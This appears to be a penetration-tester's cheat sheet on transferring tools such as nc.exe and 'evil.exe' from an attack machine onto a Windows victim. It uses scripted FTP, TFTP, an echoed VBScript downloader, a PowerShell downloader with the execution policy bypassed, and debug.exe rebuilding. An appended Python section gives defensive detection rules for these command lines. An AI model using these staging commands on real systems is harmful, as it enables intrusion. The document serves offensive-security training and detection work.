Windows basics

Transferring files

Why is this so much harder in Windows? I don't know.

FTP

Even though many Windows versions ship an FTP client, we can't use it interactively because the interactive client hangs the shell. We can, however, run a batch of commands from a file and fetch files from an FTP server such as pure-ftpd running on the attack machine.
On the victim machine, echo the following commands into a file (the two bob lines are the username and the password of the FTP account):
```bat
echo open [attack machine]> ftp.txt
echo bob>> ftp.txt
echo bob>> ftp.txt
echo binary>> ftp.txt
echo GET nc.exe>> ftp.txt
echo bye>> ftp.txt
```
Then run this command to connect:
```bat
ftp -s:ftp.txt
```

TFTP

TFTP is installed by default on Windows XP and Windows 2003. Kali also has a TFTP server:
```bash
atftpd --daemon --port 69 /tftp
/etc/init.d/atftpd restart
```
atftpd serves the directory given as its last argument (/tftp above; the package default is /srv/tftp).
From a Windows machine, use this to transfer files (-i selects binary mode):
```bat
tftp -i [host] get nc.exe
```

VBScript

Here is a good script to make a wget clone in VBScript (it may need to be piped through unix2dos before copying it over):
```bat
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
```
To execute:
```bat
cscript wget.vbs http://[host]/evil.exe evil.exe
```

PowerShell

PowerShell can't be used interactively from a non-interactive shell, but a script written to a file can be run with the flags below. From cmd.exe, build the script with:
```bat
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://[host]/file.exe" >>wget.ps1
echo $file = "output-file.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
```
To execute:
```bat
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
```

Debug.exe

On 32-bit Windows machines it is possible to use debug.exe to transfer programs. It is meant for inspecting binaries, like a debugger, but it can also rebuild them from hex. For example, a binary like nc.exe can be converted into a hex script, pasted into a file on the victim machine, and then assembled back into an executable with debug.exe.
Debug.exe can only assemble files up to 64 KB, so compress the executable with upx first:
```bash
upx -9 nc.exe
```
To convert it to hex:
```bash
wine exe2bat.exe nc.exe nc.txt
```
Pasting the contents of nc.txt into the Windows shell will recreate nc.exe.
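From the defender's side, every technique on this page leaves a distinctive process command line. The following Python, added here as an example and not part of the original page, matches a few constructed Sysmon Event ID 1 / Security 4688-style command lines against one rule per technique; the hosts and file names in the samples are made up.

```python
import re

# Constructed process-creation command lines (the CommandLine field of a Sysmon
# Event ID 1 or Security 4688 record). Hosts and file names are made up.
SAMPLE_EVENTS = [
    (1, r"ftp -s:ftp.txt"),
    (2, r"tftp -i 192.0.2.10 get nc.exe"),
    (3, r"cscript wget.vbs http://192.0.2.10/evil.exe evil.exe"),
    (4, r"powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1"),
    (5, r"cmd.exe /c debug < nc.hex"),
    (6, r"ftp ftp.example.com"),  # interactive ftp, not the scripted -s: form
    (7, r"C:\Windows\System32\notepad.exe C:\Users\bob\notes.txt"),
    (8, r"myapp.exe --debug"),  # "debug" as a flag, not debug.exe
]

# One case-insensitive rule per transfer technique described above.
RULES = {
    # ftp driven by a command file (-s:) instead of the interactive prompt
    "ftp_scripted": re.compile(r"\bftp(\.exe)?\s+.*-s:", re.I),
    # binary-mode tftp fetch
    "tftp_get": re.compile(r"\btftp(\.exe)?\s+-i\s+\S+\s+get\b", re.I),
    # a .vbs script given an http(s) URL argument, the wget-clone pattern
    "cscript_http_download": re.compile(r"\b[cw]script(\.exe)?\s+\S+\.vbs\s+https?://", re.I),
    # non-interactive PowerShell running a script with the execution policy bypassed
    "powershell_bypass_file": re.compile(
        r"powershell(\.exe)?\s.*-ExecutionPolicy\s+Bypass.*-File\s+\S+\.ps1", re.I),
    # debug.exe invoked as a program (a "--debug" flag does not count)
    "debug_exe": re.compile(r"(^|[\\\s])debug(\.exe)?(\s|$)", re.I),
}

def classify(command_line):
    """Return the sorted names of all rules the command line matches."""
    return sorted(name for name, rx in RULES.items() if rx.search(command_line))

def scan(events):
    """Map record id -> matched rule names, for records matching at least one rule."""
    hits = {}
    for record_id, command_line in events:
        matched = classify(command_line)
        if matched:
            hits[record_id] = matched
    return hits

if __name__ == "__main__":
    for record_id, rules in scan(SAMPLE_EVENTS).items():
        print(f"record {record_id}: {', '.join(rules)}")
```

Records 6 to 8 are deliberately benign look-alikes; they show that the rules key on the scripted forms rather than on the bare program names.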